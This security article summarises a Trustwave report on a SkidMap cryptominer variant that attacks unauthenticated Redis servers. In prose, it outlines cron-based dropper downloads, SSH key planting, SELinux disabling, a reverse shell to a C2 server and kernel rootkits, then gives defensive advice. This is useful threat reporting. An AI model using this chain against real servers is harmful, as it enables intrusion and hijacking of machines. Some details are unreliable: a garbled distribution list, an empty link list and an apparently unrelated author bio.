Introduction: Redis and the New SkidMap Variant
As the number of unsecured servers continues to grow, malicious actors are finding new and innovative ways to exploit them. One of the latest and most alarming campaigns targets Redis servers using a new and sophisticated variant of SkidMap malware. Discovered by Trustwave researchers, this variant showcases the constant evolution of malware and the dangers of leaving servers unprotected.
SkidMap: A Brief History
What is SkidMap?
SkidMap is a notorious crypto-miner malware detected by Trend Micro in September 2019. Unlike similar miners, SkidMap's unique feature is its utilization of kernel-mode rootkits to evade detection. It has wreaked havoc by targeting Linux machines and loading malicious kernel modules, all while concealing its actions from the host system.
Evolution of SkidMap
SkidMap's history of targeting Linux machines has been marked by continuous evolution. From its initial detection, each subsequent variant has added new functionalities and increased sophistication.
Analyzing the New Variant: A Targeted Attack on Redis Servers
Targeted Linux Distributions
The new SkidMap variant, designed to target a wide range of Linux distributions, including Alibaba, Anolis, openEuler, EulerOS, Steam, CentOS, RedHat, and Rock, signifies an expansion of its reach.
The Focus on Open Redis Instances (NO AUTH)
The recent variant observed by researchers focuses exclusively on open Redis instances, commonly referred to as ‘NO AUTH.' The absence of brute-force attacks indicates a specific and strategic approach.
A Deep Dive Into the Attack Chain
Initial Attempts and Setup
The attack begins with an attempt to log into an unsecured Redis instance, followed by setting up variables containing base64-encoded cron tasks. These tasks are crucial in initiating the subsequent steps of the malware's execution.
Alternating Download Methods
Every 10 minutes, the Cron alternates between ‘curl’ and ‘wget’ to download and execute the dropper script, showcasing adaptability and persistence in maintaining the attack.
Deployment of the Dropper Shell Script
Threat actors then deploy a shell script, masquerading as a binary executable file (ELF) disguised as a GIF image file. This contrasts with previous versions of the malware that used ‘jpeg’.
Adding SSH Keys and Disabling SELinux
Once deployed, the malware adds ssh keys in standard locations and disables the SELinux, a vital step in maintaining unauthorized access and facilitating further malicious actions.
Creating a Reverse Shell
A reverse shell is created to communicate back to the C2 server every hour via TCP/8443 port, a stealthy and efficient way to maintain control over the compromised system.
Downloading Specific Packages
Depending on the Linux distribution and kernel, the malware downloads an appropriate package named gold, stream, or euler, further highlighting the variant's adaptability.
Installation of Kernel Modules and Launching a Bot
A series of shell scripts install the kernel modules, purge logs, and launch a bot to enable additional rootkit payloads. Payloads like mcpuinfo.ko are used to hide the miner, while kmeminfo.ko inspects and manipulates network packets.
Conclusions from the Trustwave Report
Detecting the Malware: A Daunting Task
According to the report, the advancement of this malware is significant, making detection in large server infrastructures highly challenging. On home computers, excessive fan operation and case temperature were the only indicators.
The Vulnerability of Redis: A Warning
The report concludes with a stern warning about Redis. Exploiting its flaws is not complex. Designed for closed environments, Redis's vulnerability by design calls for reconsideration of its placement at the network's edge. Later releases did add security features, but the inherent risks remain.
Indicators of Compromise (IoCs) and Further Analysis
The Trustwave report also includes Indicators of Compromise (IoCs), essential for those dealing with potential threats from this variant. The published details provide valuable insights and tools for understanding and countering this evolving threat.
Redis Security: Recommendations and Best Practices
Understanding Redis Security Architecture
To counter the risks posed by SkidMap, understanding Redis's security architecture is vital. The inherent vulnerability requires stringent security measures.
Applying Patches and Keeping Systems Updated
Regular updates, patches, and monitoring of Redis servers are essential in maintaining security and thwarting potential attacks by variants like SkidMap.
Implementing Network Segmentation and Firewalls
Implementing network segmentation and firewalls can limit the spread of malware and protect the integrity of the server environment.
Continuous Monitoring and Incident Response
Continuous monitoring, coupled with a robust incident response plan, can facilitate early detection and prompt action to mitigate potential damage.
Conclusion: A Grave Reminder of Unceasing Threats
The newly discovered SkidMap variant is a glaring example of how malicious threats continue to evolve, targeting weaknesses in system security. The attack on unsecured Redis servers is a wake-up call to businesses and individuals alike. As technology advances, so does the sophistication of cyber-attacks. Staying vigilant and implementing comprehensive security measures are essential in this unending battle against cyber threats.
Further Resource:
- Understanding SkidMap: For a detailed analysis of the SkidMap malware, you can refer to Trend Micro's original research from September 2019.
- Latest Security Updates and Patches: If you are using any of the affected Linux distributions, make sure to check the respective security pages for updates and patches, such as:
- Trustwave Report: To dive into the technical details of the new SkidMap variant, the full report by Trustwave researchers provides an in-depth analysis.
Kevin Bong was formerly the Director of Corporate Security for Johnson Financial Group, and currently works as an Information Assurance Consultant for SynerComm, Inc. Kevin has a BS in Physics and Computer Science from Carroll University, an MS in Information Security Engineering from the SANS Institute, and has earned multiple certifications including PMP and GIAC GSE. Kevin is also an amateur astronomer, beekeeper, an author and instructor, and a pretty neat dad. Prior to Impulsec, Kevin worked a Penetration Testing “Drop Box” project similar to the Pwnie Express called the MiniPwner.